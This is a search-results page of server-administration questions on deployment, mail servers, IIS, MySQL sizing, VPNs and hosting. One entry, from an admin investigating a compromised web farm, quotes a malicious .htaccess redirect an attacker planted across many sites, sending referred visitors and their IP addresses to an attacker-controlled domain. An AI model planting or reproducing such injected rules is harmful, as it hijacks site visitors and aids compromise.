Search Results

Search found 8849 results on 354 pages for 'cloud hosting'.


  • Connecting SVN from Remote Server

    - by Ashish
    I have hosted my repository at Assembla and it works fine. Now I want to write a script that automates the build process: (1) take the code from the Assembla repository, and (2) make a dump and copy it onto my web server. What I have researched so far suggests using commands like svn co svn+ssh://[email protected]/home/svn/test. I believe I need to open a shell on my server and type these commands, but shell access has been disabled by my server admin. I tried to run the same thing from PHP using exec(), but the admin has disabled that too. (I am on shared hosting and want to do an automated deployment using these simple steps; I don't want to involve my local system in the process.) I'm also not sure that, even if I do get shell access to my server, commands like svn will work there, since I don't have SVN installed on my server (it's installed on Assembla). Let me know if any more explanation is needed, or if I'm on the wrong track. I'm a newbie, so please be descriptive in your answer. Thanks in advance, Ace
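
    For reference, if shell access and an svn client were available on the host, the whole "build" could be a short cron-driven script; a minimal sketch, with a hypothetical repository URL and target path:

        #!/bin/sh
        # Hypothetical deploy sketch: requires an svn client on the web host.
        REPO="https://subversion.assembla.com/svn/test/trunk"
        TARGET="/home/user/public_html"

        # 'svn export' fetches a clean copy without .svn metadata,
        # which is safer to serve than a full working copy.
        svn export --force "$REPO" "$TARGET"

    Without shell access or exec(), nothing on the shared host can run svn at all, so the realistic options are deploying from some machine that does have a client, or a hosted build/deploy service that pushes the exported files over FTP.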

    Read the article

  • Separate domains vs. one domain with alias-domains

    - by Quasdunk
    I have tried to ask this question a few days ago, but I'm afraid it was not clear enough, so here's another try. I have set up a LAMP server using ISPConfig 3 for administration. PHP is running over FastCGI. I have several domains, like my_site.com, my_site.net and my_site.org, but they all point to the same application/website. Each domain has its own web root folder and runs under its own user. The application itself is in a common directory owned by another user, like so:

        # path to my_application (owned by web1)
        /var/www/clients/client1/web1/web/my_application/

        # symlink to my_application from the my_site.com web root (owned by web5)
        /var/www/my_site.com/web -> /var/www/clients/client1/web1/web/

        # symlink to my_application from the my_site.net web root (owned by web4)
        /var/www/my_site.net/web -> /var/www/clients/client1/web1/web/

    With a setup like this I have encountered a few problems concerning permissions when performing filesystem operations from PHP. For instance, if the application is called via my_site.com, the user web5 tries to write something to the application folder. But the application folder is owned by the user web1, so web5 is not allowed to write there. As far as I understand, this is simply how FastCGI works. After some research and asking a few people, the solution seems to be to break it all down to one domain (e.g. my_site.com) and define the other domains (my_site.org, my_site.net) as aliases of that one domain. That way, there would be only one user, with all the necessary permissions. However, this would mean we'd have to buy a multi-domain SSL certificate, but we already have an SSL certificate for each domain. We were able to use them with our previous provider (managed hosting), where we also had only one web directory and multiple domains. So if this was possible, I wonder: is putting all the domains together into one vhost, with one main domain and several alias domains, the right approach here? Or have I misunderstood something?
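
    The alias-domain approach usually comes down to a single vhost; a minimal sketch, assuming Apache and the paths above:

        <VirtualHost *:80>
            ServerName my_site.com
            # the other domains become aliases of the same vhost,
            # so every request runs as the same FastCGI user
            ServerAlias my_site.net my_site.org
            DocumentRoot /var/www/clients/client1/web1/web
        </VirtualHost>

    For HTTPS this is exactly where the multi-domain (SAN/UCC) certificate requirement comes from: one vhost serving several names can only present one certificate.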

    Read the article

  • Emails sent from ColdFusion using the same SMTP/Exchange server work from one machine but fail from another

    - by Peter Herdenborg
    First, apologies if this question is too vague or has too little information to really be answerable. I don't normally work with these issues, and I don't have full access to the environment. However, the hosting provider seems to have a hard time tracking down the issue, so I am hoping that someone can at least provide me with some qualified guesses about the most likely problem. Here goes: a client I work for has a hosted IT environment, based on virtual machines running Windows 2008 R2 Standard. Our website, based on ColdFusion 9, was recently migrated from one virtual machine to another, and though ColdFusion is configured in exactly the same way, using the same SMTP server (the client's Exchange server, hosted in the same environment and in the same AD as both web servers), sending emails to external recipients no longer works. It still works fine when testing from the old machine. This is what I've learnt so far (all emails are sent using a valid from-address on the client's domain):
    - Emails sent to other recipients on the same domain are delivered without any problem.
    - Emails sent to external recipients on other domains are never delivered.
    - When sending emails to both internal and external recipients, no emails are delivered.
    - When one of these emails is received at an internal address, the sender is now indicated as "[email protected]", while when sent from the old machine it used to say just "sender". This hints, I think, that the Exchange machine "recognizes" the old web server while the new one is a stranger to it.
    - In ColdFusion's mail log, all messages appear to be successfully delivered to the SMTP server.
    Any ideas about what settings to look at, what log entries to search for, or how to compare the old web server with the new one will be highly appreciated.

    Read the article

  • Debian Lenny email server

    - by Dal
    Hi, I am a newbie. I set up a Debian Lenny box at home with the web and email servers from the default installation. I followed the instructions for Exim, ran dpkg-reconfigure exim4-config, and set it up for mydomainhere.com. I created a one-line message file and attempted to test Exim by running the command exim [email protected] < msgfile. I also tried using exim4 and Exim, but I get the same error: -bash: Exim: command not found. Obviously I am ignorant of how to run and test Exim. I also tried a PHP script that sends a test mail, with no success; that script is tested and works fine when I send it from my hosting ISP on a different domain, so I know the PHP script is good. The Debian system sits behind a Netgear firewall and uses a 192.168.1.x IP. The web server works great and users can visit my site, but I lack the knowledge to get email working. I'd appreciate it if someone could guide me.
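
    For what it's worth, on Debian the binary is lowercase (exim4, in /usr/sbin, so it may need root or the full path), which would explain the "command not found"; a minimal test sketch, with a hypothetical recipient address:

        # send a prepared message file with verbose output
        /usr/sbin/exim4 -v [email protected] < msgfile

        # or pipe a one-liner
        echo "test body" | /usr/sbin/exim4 -v [email protected]

        # then watch the delivery attempt in the log
        tail -f /var/log/exim4/mainlog

    Note that Debian's Exim configuration asks whether mail should be delivered directly or via a smarthost; on a home connection behind NAT, many ISPs block outbound port 25, which shows up in the mainlog as connection timeouts.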

    Read the article

  • IIS 6 Denies access to the default document

    - by Jim
    I've got Windows Server 2k3 with IIS6 hosting a couple of ASP.NET MVC 2 applications (.NET 4), all in the Default Web Site. Most of them simply use Integrated authentication, but a couple use Forms as well. All the applications work properly and are correctly accessible. The problem I'm trying to resolve is access to the default document, currently specified as index.htm. Both index.htm and the Default Web Site are configured to allow anonymous access (with none of the authenticated access boxes checked). However, access to the file is denied: requests to server.domain.tld/ and server.domain.tld/index.htm both yield 401 errors, while server.domain.tld/default.htm (a file that does not exist) properly returns a 404. If I alter the file security on index.htm to allow Integrated authentication, then requesting /index.htm directly works properly for users with domain accounts, but anonymous users get a login prompt/401. How can I configure IIS to allow all users to view index.htm via server.domain.tld/?
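
    Since a 401 on an anonymous-enabled file usually means the NTFS ACL, not IIS, is refusing the anonymous account, checking what the IUSR account can read is a reasonable first step; a minimal sketch, assuming Server 2003's cacls and a hypothetical machine name:

        REM grant the anonymous IIS account read access to the default document
        cacls index.htm /E /G IUSR_SERVERNAME:R

    The 404 on default.htm supports this reading: IIS could traverse the directory; it just couldn't open index.htm as the anonymous user.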

    Read the article

  • How do I make a PPT file as small as possible?

    - by grunwald2.0
    Currently I am agonizing over several large presentation files, which I happened to reprint to PDFs. One thing I wondered: do PPTs (from Microsoft PowerPoint) always have to be that big? And what are the strategies for making a PPT smaller? (Say, ceteris paribus, at 25 slides, and assuming one isn't allowed to use a cloud-based service like GDocs, rocketslide or Prezi.) Of course there are the obvious "bad guys": images and graphics. But how about roll-over animations and the like; who knows how much space they take? How about SmartArt? Could one save file size by using OpenOffice or LibreOffice Impress? (I didn't try it yet.) And "what if": if we need to include, say, five images (or charts that can't be remade in Excel in time), how would we best reduce the file-size impact of those five images? I ask all this from an honest "business" perspective. I am no nerd or "Microsoft MVP", and I don't intend to delve into LaTeX or similar yet, but that doesn't mean I'm not curious and very willing to learn. I am basically interested in (proven) best practices. Yes, I know this question lacks "initial research", but I think its perspective is interesting and unique to a lot of people, and if we intend to make SE a "Q&A"/wiki kind of reference site, this question might be a good way to collect advice on a very well-defined goal: minimum file size.

    Read the article

  • MySQL - moving to a lower-performance server, how small can I go?

    - by pedalpete
    I've been running a site for a few years now which really isn't growing in traffic, and I want to save some money on hosting but keep it going for the loyal users of the site and API. The database has a nearly 4-million-row table and runs on a 4 GB dual Xeon 5320 server. When I check server stats with ps aux, MySQL shows about 11% capacity, so there's no serious load. The main query against MySQL runs in about 0.45 seconds. I popped over to linode.com to see what kind of performance I could get out of one of their tiny boxes, and their 360 MB RAM Xen VPS returns the same query in 20 seconds. Clearly not good enough. I've looked at the MySQL variables, and they are both very similar (I've included the SHOW VARIABLES output below, in case anybody is interested). Is there a good way to decide what size server is needed based on what I'm coming from? Is it RAM that is likely making the difference, given the large table size? Is there a way for me to figure out how much RAM would be ideal? Here's the output of SHOW VARIABLES (though I'm not sure it's important):

        Variable_name                     Value
        auto_increment_increment          1
        auto_increment_offset             1
        automatic_sp_privileges           ON
        back_log                          50
        basedir                           /usr/
        bdb_cache_size                    8384512
        bdb_home                          /var/lib/mysql/
        bdb_log_buffer_size               262144
        bdb_logdir
        bdb_max_lock                      10000
        bdb_shared_data                   OFF
        bdb_tmpdir                        /tmp/
        binlog_cache_size                 32768
        bulk_insert_buffer_size           8388608
        character_set_client              latin1
        character_set_connection          latin1
        character_set_database            latin1
        character_set_filesystem          binary
        character_set_results             latin1
        character_set_server              latin1
        character_set_system              utf8
        character_sets_dir                /usr/share/mysql/charsets/
        collation_connection              latin1_swedish_ci
        collation_database                latin1_swedish_ci
        collation_server                  latin1_swedish_ci
        completion_type                   0
        concurrent_insert                 1
        connect_timeout                   10
        datadir                           /var/lib/mysql/
        date_format                       %Y-%m-%d
        datetime_format                   %Y-%m-%d %H:%i:%s
        default_week_format               0
        delay_key_write                   ON
        delayed_insert_limit              100
        delayed_insert_timeout            300
        delayed_queue_size                1000
        div_precision_increment           4
        keep_files_on_create              OFF
        engine_condition_pushdown         OFF
        expire_logs_days                  0
        flush                             OFF
        flush_time                        0
        ft_boolean_syntax                 + -    (output cut off here)

    For some reason, that table formats properly in the preview, but apparently not when viewing the question. Hopefully it isn't needed anyway.
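
    RAM is the most likely difference: on the 4 GB box the table's indexes can sit in memory, while a 360 MB VPS has to hit disk. One way to measure the working set before picking a server size; a minimal sketch, with a hypothetical schema name:

        -- total data and index size per table, in MB
        SELECT table_name,
               ROUND(data_length  / 1024 / 1024) AS data_mb,
               ROUND(index_length / 1024 / 1024) AS index_mb
        FROM   information_schema.TABLES
        WHERE  table_schema = 'mydb';

    As a rough rule, a MyISAM setup wants key_buffer_size to cover the hot indexes, and an InnoDB one wants innodb_buffer_pool_size to cover data plus indexes; a VPS with headroom for that figure should behave much more like the current box.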

    Read the article

  • Creating a private wiki

    - by Hand-E-Food
    I want to create a simple, private wiki, but am really struggling to find what I need. I require the following features:
    - Private wiki. Only I will read or write it.
    - Some formatting capability: headings, bold, italic, bullets, block quotes.
    - Wiki viewer for Windows 7. If it comes with an editor, I need to be able to hide it.
    - Page editor for Windows 7.
    - Page editor for iPhone.
    - Synchronized via the cloud, but available offline in Windows.
    So far, my research has led me to the Markdown language. I can easily edit it as plain text using Notepad++ on Windows and Elements on iPhone. I can sync these files through Dropbox and have them available offline. What I can't find is a suitable viewer for Windows. I'd prefer to steer away from HTML because of its verbose formatting codes. Can anyone recommend a solution? If need be, I'll be happy to make a small one-off payment for software.

    Read the article

  • Centralized backup method recommendation for SMEs with various OSes

    - by Akinator
    Hi, I was wondering what in your opinion is the "best" method for having "everything" backed up in the following situation. We are an SME with 10 computers in total: three of them are Macs, and the rest are Windows (1 Vista, 4 Win7 and 2 XPs). I'm very open to what the method should be, but you should also consider the following: we have very limited resources and quite "small" bandwidth (4 Mbps download for everyone and 0.4 Mbps upload, yep, that's it, though this might get a little bit better). One of the main things to back up would be the mail. Considerations: all the Windows computers use Outlook, mainly 2003, and one of the Macs uses Outlook too (for Mac of course, not 2011 yet). We also have to back up the files: not a huge amount, very few very big files, very organized (by machine). What I would like to hear is your opinion as to which would be the best method (or combination of methods, preferably one of course). We are not sure what we need and I'm open to suggestions, though an online (cloud-based) application would be great; remember the bandwidth is unbearable. The last thing to consider is that we would like to do weekly backups (unless the method is very easy, of course). Thanks in advance! I tried to be as specific as possible, but if anything is needed I'll gladly update; please ask for any clarification needed! Please avoid answers like "upgrade all to Windows 7 and throw away your Macs" :) Ours may not be an ideal situation, but it is what it is, and right now it would be impossible for us to change it, for a lot of reasons.
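
    For the file side, one low-budget pattern is pulling every machine's shared folder onto a single box overnight, so only that box ever talks to an offsite target; a minimal sketch, with hypothetical hosts and paths (the Windows machines would need an rsync service such as DeltaCopy, or a plain SMB mount instead):

        #!/bin/sh
        # nightly pull of each machine's share onto one backup box
        rsync -av --delete backupuser@mac1:/Users/Shared/  /backups/mac1/
        rsync -av --delete backupuser@winpc1:/shared/      /backups/winpc1/

    One caveat for the mail: Outlook locks its PST files while running, so copies have to happen with Outlook closed (or via a PST-aware backup tool).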

    Read the article

  • Bizarre client IP switch-up on VPN

    - by B. VB.
    Let A.B.C.D be the public IP of my VPN server, and let W.X.Y.Z be the IP of the client before it connects to the VPN. My VPN server's IP address on the LAN is 10.8.0.1, and the client's is 10.8.0.6. I also run a webserver on the same machine hosting the VPN. On it is a simple webpage that does exactly the same thing as whatismyip.org (i.e., it simply prints the IP of the requester). Let me illustrate the scenario. In a Chrome window I have three tabs; in parentheses is the URL:
    - Tab 1 (http://whatismyip.org): A.B.C.D. This is what I expect to see; it's the public IP of the VPN server.
    - Tab 2 (http://10.8.0.1): 10.8.0.6. OK, looks expected; they are behind the same LAN now.
    - Tab 3 (http://A.B.C.D): W.X.Y.Z. WTF??
    Basically, if I access the webserver while tunneled, it shows the IP address of my machine PRIOR to tunneling! Remember, Tab 2 and Tab 3 are the same webpage. Why does Tab 3 not show the client IP as its own IP (i.e., show A.B.C.D)? I hope this question is clear. Thanks in advance!
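
    One likely explanation (assuming a routed setup such as OpenVPN with a redirected default gateway): the client has to keep a host route to A.B.C.D via its original gateway, since the tunnel cannot carry its own transport packets, so requests aimed directly at the public IP leave outside the tunnel and arrive with the pre-VPN source address. A minimal check from a Linux client:

        # which interface/source address is used to reach the VPN server's public IP
        ip route get A.B.C.D

        # compare with a destination that goes through the tunnel
        ip route get 10.8.0.1

    If the first command shows the physical interface and the second shows tun0, that is the whole story.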

    Read the article

  • Something like Dropbox for local use

    - by Casper
    I am looking for a solution to sync folder pairs between a NAS and multiple local Macs. Each of the Macs could edit files, and the other Macs should then be synced automatically. Basically, my own local version of Dropbox without the "cloud storage". I have looked into solutions using rsync; as I understand it, rsync is not really capable of doing a bi-directional sync. I also don't want to have to invoke the sync process manually. I would prefer a daemon running in the background, waiting and checking for changes and then syncing them "live". The program should also be flexible enough to recognize that it sometimes (as with laptops) cannot reach the NAS; it should then just wait for the connection to come back, without bugging me every few minutes. I have looked into synk, folderwatch, rsync and a few others, but I haven't really found a solution. Isn't there something like Microsoft's "offline folders" for the Mac? Thanks. PS: just for clarification, I don't want to sync for backup purposes; I want to sync so that all the Macs have a local copy of the most recent changes to files.
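
    Of the usual command-line candidates, unison is the one actually built for bi-directional sync; a minimal sketch, with a hypothetical NAS path:

        # two-way sync between a local folder and the NAS over ssh,
        # retried every 60 seconds while the machine is up
        unison /Users/me/Documents ssh://nas//volume1/documents \
               -batch -repeat 60

    Wrapped in a launchd job it approximates the requested daemon; it is polling rather than "live", though, and it simply errors and retries when the NAS is unreachable.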

    Read the article

  • Finding Webserver Vulnerability

    - by Brent
    We operate a webserver farm hosting around 300 websites. Yesterday morning a script placed .htaccess files owned by www-data (the Apache user) in every directory under the document_root of most (but not all) sites. The content of the .htaccess file was this:

        RewriteEngine On
        RewriteCond %{HTTP_REFERER} ^http://
        RewriteCond %{HTTP_REFERER} !%{HTTP_HOST}
        RewriteRule . http://84f6a4eef61784b33e4acbd32c8fdd72.com/%{REMOTE_ADDR}

    Googling for that URL (the hostname is the MD5 hash of "antivirus"), I discovered that this same thing happened all over the internet, and I am looking for somebody who has already dealt with this and determined where the vulnerability is. I have searched most of our logs but haven't found anything conclusive yet. Have others who experienced the same thing gotten further than I have in pinpointing the hole? So far we have determined:
    - the changes were made as www-data, so Apache or its plugins are likely the culprit;
    - all the changes were made within 15 minutes of each other, so it was probably automated;
    - since our websites have widely varying domain names, I think a single vulnerability on one site was responsible (rather than a common vulnerability on every site);
    - if an .htaccess file already existed and was writeable by www-data, the script was kind and simply appended the above lines to the end of the file (making it easy to reverse).
    Any more hints would be appreciated.
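
    For triage across 300 document roots, bracketing the 15-minute window and grepping for the injected hostname narrows things quickly; a minimal sketch, assuming GNU find/grep and hypothetical timestamps:

        # reference files marking the attack window
        touch -t 201105010900 /tmp/w0
        touch -t 201105010915 /tmp/w1

        # every .htaccess written inside the window
        find /var/www -name .htaccess -newer /tmp/w0 ! -newer /tmp/w1

        # every file that still mentions the injected hostname
        grep -rl '84f6a4eef61784b33e4acbd32c8fdd72' /var/www

    Cross-referencing that window against the access logs of the affected vhosts (especially POST requests to PHP scripts just before the first .htaccess appeared) is usually what identifies the exploited application.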

    Read the article

  • Remotely port forward/launch process or a client-less remote desktop app?

    - by DC177E
    I have an XP box running LogMeIn at a remote location behind a Linksys router. It was running well for a whole four days, until we had a power failure. Our ISP gave us a new IP, the machine restarted, and LogMeIn did not autorun (or at least did not automatically sign in), and our service (which may or may not be a Minecraft server with non-backed-up save files) also did not run on startup. LogMeIn does not register the new IP (it still displays the old one). I have a DDNS updater service, so I do know the new dynamic address. I have tried the built-in XP Remote Desktop service but, as with almost all non-cloud-based remote desktop services, it requires a port forward. Thus, I would appreciate it if anyone has any ideas as to:
    - A: Any way of accessing our router remotely to forward the Remote Desktop port. I've seen the Remote Management option (forwarding the setup page to port 8080), but I do not have it enabled. I've tried UPnP, but again, the setup page for our router is not forwarded.
    - B: Any way of remotely launching a process that does not require port forwarding (or uses ports 255XX, 18XXX, or 9000), such as a remote console service built into XP. I realize this is a near impossibility.
    - C: A way to remotely start LogMeIn and sign in, which is likely a definite impossibility.
    Sorry if this is too specific for Stack Exchange, or if I've put it in the wrong section (is Super User the correct place for this?). Ideas would, again, be much appreciated, shot-in-the-dark as this may be.

    Read the article

  • How much free memory should I have on my webserver?

    - by neanderslob
    I have a webserver currently hosting two WordPress sites and some Java-based collaboration software. The server has 2 GB of memory and is currently using about 1.8 GB. Right now what's on here is pretty much a pilot project getting negligible traffic, so I think it's pretty clear I'll be needing more memory. I was wondering how, if I released it, I might anticipate my memory needs based on the traffic it gets. I've poked around on Google, and what I've found has been a bit tenuous. Is there a good heuristic for projecting memory demands as a function of the base (no-traffic) load on the server? For reference, the output of free -m is below:

                     total    used    free  shared  buffers  cached
        Mem:          2048    1832     215       0        0       0
        -/+ buffers/cache:    1832     215
        Swap:            0       0       0

    To me this looks like memory that is actually used, not an illusion due to caching or anything else. I figure the demands of my collaboration software will have to be tested experimentally, so here's free -m without that software running:

                     total    used    free  shared  buffers  cached
        Mem:          2048    1109     938       0        0       0
        -/+ buffers/cache:    1109     938
        Swap:            0       0       0

    My plan B for figuring this out is to add a bunch of swap space to the server, give it some traffic, and adjust according to the amount of swap that gets used. I was just wondering if anyone had a good rule of thumb for estimating how much memory I should plan on in advance... or whether what I'm thinking is nuts. Many thanks in advance (I'm really quite new to this).
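
    A reasonable first step before any heuristic is seeing which processes hold the 1.8 GB, since traffic scaling mostly multiplies the per-request workers (Apache/PHP) rather than the fixed residents (MySQL, the Java service); a minimal sketch:

        # largest resident-memory consumers first
        ps aux --sort=-rss | head -15

    From there the usual back-of-the-envelope is: base load + (size of one worker x expected concurrent requests). The all-zero buffers/cached columns, incidentally, are typical of container-style virtualization (e.g. OpenVZ), where the host hides cache accounting from the guest.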

    Read the article

  • Mail server checklist

    - by Jeff
    We recently ran into some issues with our mail server setup, so I'm preparing a list of actions we should enforce in order to maintain a proper email solution within our company. We have around 80 Exchange users and send mass emails to 20,000+ customers almost monthly. The checklist I currently have:
    1) McAfee MX Logic 'cloud' anti-spam functionality for incoming messages
    2) antivirus on each computer in the company
    3) antivirus on the Exchange and DNS servers
    4) set up an SPF record (see the sketch below)
    5) set up DKIM
    6) set up DomainKeys
    7) set up Sender ID
    8) submit the SPF record to Microsoft, Yahoo, etc. for whitelisting purposes
    9) configure message size limits in Exchange to safe numbers
    10) I have 2 outside IPs for my email server; in case one gets blacklisted, switch to the backup
    11) my internet site rests on a different IP than the mail server
    12) all mass emails for the company are sent through a third-party company (listtrak.com)
    13) set up the domain aliases (media, enews, and bounce) for the third-party mass-mail software
    14) verify the setup using [email protected]
    15) configure Group Policy and our opendns.org account to prevent unwanted actions and website viewing
    For the mass emails:
    1) schedule them to send different amounts at different times (1,000 at 10am, 1,000 at 4pm, 1,000 at 10am the next day)
    2) set up user preferences so recipients decide what they want to receive (their interests)
    3) send a steadier flow of email, maybe 100 a week with top new products, instead of 20,000 every other month
    If anyone has suggestions or additions/subtractions to this checklist, they are greatly appreciated. Thank you.
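
    A starting-point SPF record for this kind of split setup (corporate Exchange plus a third-party bulk sender); a minimal sketch with hypothetical IPs, and the include mechanism must match whatever the bulk provider actually publishes:

        ; DNS TXT record on the sending domain
        example.com.  IN TXT  "v=spf1 mx ip4:203.0.113.10 ip4:203.0.113.11 include:spf.bulkprovider-example.com ~all"

    Keeping both outside IPs in the record matters; otherwise the "switch to the backup IP" step in item 10 would itself cause SPF failures.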

    Read the article

  • Concurrent users with QuickBooks?

    - by airietis
    I work at a company where 3 people regularly use the same QuickBooks file, but they work remotely on different networks. I need to implement a solution that allows all three of us to access QuickBooks at the same time remotely (and each make changes at the same time). We have a spare desktop PC that can be utilized as a server. So, my question is: what is the cheapest and most hassle-free solution to this problem? I've considered application cloud hosting; however, it is very expensive ($40 per user per month) and we are on a tight budget. Is it possible to install QuickBooks on my own server and have the others connect to it remotely? If so, what is the best way to accomplish this: Remote Desktop Protocol? Or is there a built-in feature for this in QuickBooks Premier 2013? EDIT: As MDMarra mentioned, I am looking for a solution that offers true simultaneous access. Would using a dedicated server and having users connect over a VPN be a viable solution?

    Read the article

  • Mail Server using Postfix

    - by unknown (google)
    I have currently set up my web application on an Amazon EC2 server. It is well known that sending email directly from EC2 is problematic. As a cheap and long-lasting alternative to using AuthSMTP, is it possible to rent a server and use it as a mail server? I am currently looking for cheap hosting that will give me root access, so that the box can be configured and used as a relayhost. I am currently using Postfix as the MTA. Has anyone implemented this before? I am curious about the feasibility of this solution. I guess the common requirements are:
    1: A dedicated IP that is not blacklisted.
    2: An open relay (open to my server only).
    Any tips for header configuration to keep the mails out of the spam folder? This is essentially cloning AuthSMTP for personal use. Any suggestions for other mail server software instead of Postfix? Another question is reverse DNS for this server: should a PTR entry be present if a server is used as a relayhost?
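
    On the EC2 side, pointing Postfix at the rented relay is a few lines in main.cf; a minimal sketch, with a hypothetical relay hostname and SASL credentials:

        # /etc/postfix/main.cf on the EC2 instance
        relayhost = [relay.example.com]:587
        smtp_sasl_auth_enable = yes
        smtp_sasl_password_maps = hash:/etc/postfix/sasl_passwd
        smtp_sasl_security_options = noanonymous
        smtp_tls_security_level = encrypt

    On the relay itself, restricting mynetworks (or SASL) to the EC2 machine avoids ever running a true open relay; and yes, a PTR record that matches the relay's HELO name is one of the cheapest deliverability wins available.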

    Read the article

  • Managed LAMP platform for maximizing availability and global reach, not scalability

    - by user66819
    Assume a Linux/Apache/MySQL/PHP application for a small base of registered users. With a small userbase there are no traffic peaks, so the scalability that cloud platforms offer is not imperative; but the system is mission-critical, so availability is the primary goal. Users are also distributed across Asia, Europe, and the US, so multiple server locations that minimize users' network hops would be highly desirable. The dream: a managed VPS platform where we would configure a single server (uploading PHP and other files, manipulating the database, etc.), and the platform would automatically mirror that server in a handful of key places around the world (say, one on each US coast, one in Europe, one in East Asia). Filesystem synchronization and MySQL replication would happen automatically. The core operating system would be managed, so we wouldn't need to do full system administration and security, and low-level backups would also be handled by the service provider (though we would do our own backups as well). Couple this with some sort of DNS geo-detection, so users are routed to the nearest operational server... with support for HTTPS, of course. Does such a dream exist? If not, what are some approaches to accomplish the same end with minimal time investment and minimal monthly hosting costs?

    Read the article

  • Problem running MVC3 app in IIS 7

    - by mjmoore99
    I am having a problem getting an MVC 3 project running in IIS7 on a computer running Windows 7 Home 64-bit. Here is what I did:
    1. Installed IIS 7, accessed the server, and got the IIS welcome page.
    2. Created a directory named d:\MySite and copied the MVC application into it. (The MVC app is just the standard app created by a new MVC 3 project in Visual Studio; it displays a home page and an account logon page. It runs fine inside the Visual Studio development server, and I also copied it out to my hosting site, where it works fine too.)
    3. Started the IIS management console, stopped the default site, and added a new site named "MySite" with a physical directory of d:\MySite.
    4. Changed the application pool named MySite to use .NET Framework 4.0, integrated pipeline.
    When I access the site in the browser, I get a list of the files in the d:\MySite directory. It is as if IIS is not recognizing the contents of d:\MySite as an MVC application. What do I need to do to resolve this?
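
    A raw directory listing usually means ASP.NET 4 isn't registered with IIS, so no managed handler ever claims the request; a minimal sketch of the usual fix, assuming the 64-bit framework path and an elevated prompt:

        REM register ASP.NET 4.0 with IIS
        %windir%\Microsoft.NET\Framework64\v4.0.30319\aspnet_regiis.exe -i

    Extensionless MVC routes on IIS 7 also depend on runAllManagedModulesForAllRequests="true" (or the extensionless-URL update); the Visual Studio template normally puts that in web.config already.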

    Read the article

  • Ping results echoed to a text file on a Windows XP machine show an unusual character rather than the outcome

    - by Richard Rice
    Here is the situation: I have a Windows XP machine that I would like to have ping another machine and send the output to a text file for review at a later date. This is quite a standard question, with several answers on this website and others. The issue is that when reviewing the txt file afterwards, the outcome of the ping appears as a strange character. A screenshot of the text file output can be found at the following link; please note it's the first 8 ping outputs that have the strange character. The %%B was me hoping that would output what I wanted! (Cannot upload the image to any hosting website, because the company I work for seems to be afraid of them...) Here is the code I'm using:

        @echo off
        for /f "tokens=1-2 delims=/:" %%a in ("%TIME%") do (set mytime=%%a%%b)
        PING 1.1.1.1 -n 1 -w 1000 >NUL
        for /f "tokens=*" %%A in ('ping 192.168.5.2 -w 10 -n 1') do (
            echo %date% %time% %%A >> C:\Temp\Ping_Checks\GarrickSide.txt && GOTO Ping
        )
        :Ping
        PING 1.1.1.1 -n 1 -w 1000 >NUL
        for /f "tokens=* skip=2" %%A in ('ping 192.168.5.2 -w 10 -n 1') do (
            echo %date% %time% %%A >> C:\Temp\Ping_Checks\GarrickSide.txt && GOTO Ping
        )

    This code works fine on a Windows 7 machine but not on Windows XP. It appears the echo command isn't outputting the right data, but I don't understand this well enough to correct it. Can anyone spot where I'm going wrong?

    Read the article

  • Google Mail not arriving - relay not allowed

    - by renevdkooi
    I have a server running sendmail, hosting my domain mind-zone.nl, and I changed the MX records to point to the server. When I use Hotmail or any other client, the email arrives and everything is fine. Only mail from Gmail's servers is bounced; Gmail returns "relay denied". I have set up all the virtual-host settings etc., and from the command line I can send mail as well. Hotmail works, etc.; just not Gmail. The strange thing is what Gmail returns. Look at the lower part: the "Received: by" line shows an IP address which is not mine and has absolutely nothing to do with my domain, while when I do an nslookup (switching to Google's DNS servers) it states that the IP address for my domain correctly points at my server.

        Technical details of permanent failure:
        Google tried to deliver your message, but it was rejected by the
        recipient domain. We recommend contacting the other email provider
        for further information about the cause of this error. The error
        that the other server returned was:
        554 554 5.7.1: Relay access denied (state 14).

        ----- Original message -----
        MIME-Version: 1.0
        Received: by 10.14.37.138 with SMTP id y10mr3421504eea.43.1297665573901;
                Sun, 13 Feb 2011 22:39:33 -0800 (PST)
        Received: by 10.14.29.75 with HTTP; Sun, 13 Feb 2011 22:39:33 -0800 (PST)
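
    Two things worth verifying here: what MX record Google's resolvers actually see, and whether sendmail considers itself the final destination for the domain (the literal meaning of "Relay access denied"); a minimal sketch, assuming a stock sendmail layout:

        # the MX record as seen through Google's public resolver
        dig MX mind-zone.nl +short @8.8.8.8

        # sendmail only accepts mail for domains listed here
        grep mind-zone.nl /etc/mail/local-host-names

    The 10.x.x.x "Received: by" lines in the bounce are Google's internal hosts and are normal; a stale or secondary MX record still pointing at a host that doesn't list the domain in local-host-names is the more common culprit.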

    Read the article

  • Wildcard subdomain setup: wanting to change the host IP throws off client A records... what to do?

    - by Joe
    Here is the current setup, in a nutshell. The site uses a wildcard subdomain, so *.website.com is accessible. Clients can then map their own domains with an A record to the server's IP address, and htaccess redirections and environment variables translate each request to the appropriate *.website.com. Everything is working perfectly... but now comes the problem. The site has grown larger than a single dual quad-core Xeon server can handle at peak times. Cloud options look tempting, but clients are pointing their domains to a single IP address (our server) with an A record. This was probably bad planning from the start, but the question is: if this were done today, how would we set it up so that clients use, say, a CNAME to point their domains at our server rather than an A record? And if that is not possible for the root domain, how can we use multiple IP addresses on our side to serve the incoming HTTP requests? Complex enough? Hope I've explained it well!
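
    The hard constraint is that a zone apex (the bare domain) cannot be a CNAME, so the usual compromise looks like this; a minimal sketch, with hypothetical names:

        ; client zone: subdomains can track your infrastructure by name...
        www.clientdomain.com.   IN CNAME   edge.website.com.
        ; ...but the bare domain must remain an A record
        clientdomain.com.       IN A       203.0.113.10

    The common way out is to keep one stable public IP on a small proxy or load-balancer tier and scale the real web servers behind it; clients' A records then never need to change, no matter how the backend grows.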

    Read the article

  • What kind of server configuration is best for a chatting app? [closed]

    - by mohabitar
    I'm just now starting to go deeper into the world of cloud hosting and databases, and am getting overwhelmed by how deep this information goes. It's all a little too much to consume in a short amount of time. I get a lot of pricing information, but I'm unable to determine what it means to me. I'm making what you might compare to an email app: users can send messages to one another. Out of the several options, I just don't understand what would be ideal for an app like this, where users would be constantly sending and receiving text data. With Amazon DynamoDB, I have to specify a predefined throughput as a number of reads and writes per second. Sure, I can just type 50, but I'm not exactly sure what 50 writes per second represents. I'm trying to determine the most cost-efficient solution, and I want to know what a throughput of 50 reads/writes per second compares to. Is that a high number? What is a good throughput number for a message-sending app with, say, 50,000 daily users? I'm just providing specific numbers so I can understand what these throughput figures represent. 100 transactions per second seems like a small number to me, but I'm not familiar with this stuff, so I'm just looking to put everything in context. What would 100 reads/writes per second be useful for? Are there any average example values available? And I'm not sure what each service is good for: for a message-sending app, is there any reason I'd want to choose, say, Amazon DynamoDB over Google App Engine? Any insight would be greatly appreciated.
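
    A back-of-the-envelope calculation puts the numbers in context; every figure below is an assumption, not a measurement:

        50,000 daily users x 20 messages/day  = 1,000,000 writes/day
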